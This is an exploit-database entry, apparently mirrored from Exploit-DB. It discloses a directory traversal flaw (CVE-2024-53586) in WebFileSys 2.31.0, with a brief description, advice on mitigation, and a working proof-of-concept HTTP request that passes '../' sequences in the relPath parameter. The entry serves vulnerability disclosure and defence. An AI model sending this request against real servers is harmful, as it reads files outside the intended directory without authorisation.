header-logo
Suggest Exploit
vendor:
WebFileSys
by:
Korn Chaisuwan, Charanin Thongudom, Pongtorn Angsuchotmetee
6.1
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: WebFileSys
Affected Version From: 2.31.0
Affected Version To: 2.31.0
Patch Exists: NO
Related CWE: CVE-2024-53586
CPE: webfilesys:webfilesys:2.31.0
Metasploit:
Other Scripts:
Platforms Tested: macOS
2024

WebFileSys 2.31.0 – Directory Traversal Vulnerability in relPath Parameter

WebFileSys 2.31.0 is prone to a directory traversal vulnerability in the 'relPath' parameter. An attacker can exploit this issue by sending a crafted HTTP request to the affected server, allowing them to traverse directories and access sensitive files outside the intended directory structure. This vulnerability has been assigned CVE-2024-53586.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input to prevent malicious directory traversal sequences. Additionally, access controls should be implemented to restrict user access to sensitive directories.
Source

Exploit-DB raw data:

# Exploit Title: WebFileSys 2.31.0 - Directory Path Traversal in relPath Parameter
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Charanin Thongudom, Pongtorn Angsuchotmetee 
# Vendor Homepage: http://www.webfilesys.de/webfilesys-home/index.html
# Software Link: http://www.webfilesys.de/webfilesys-home/download.html
# Version: 2.31.0
# Tested on: macOS
# CVE : CVE-2024-53586

GET /webfilesys/servlet?command=mobile&cmd=folderFileList&initial=true&relPath=/../../.. HTTP/1.1
Host: www.webfilesys.de
Cookie: JSESSIONID=BE9434E13C7CDE33D00D6F484F64EFB8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.webfilesys.de/webfilesys/servlet?command=menuBar
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Priority: u=0, i
Te: trailers
Connection: keep-alive

Navigation

Suggest Exploit

Services By CQR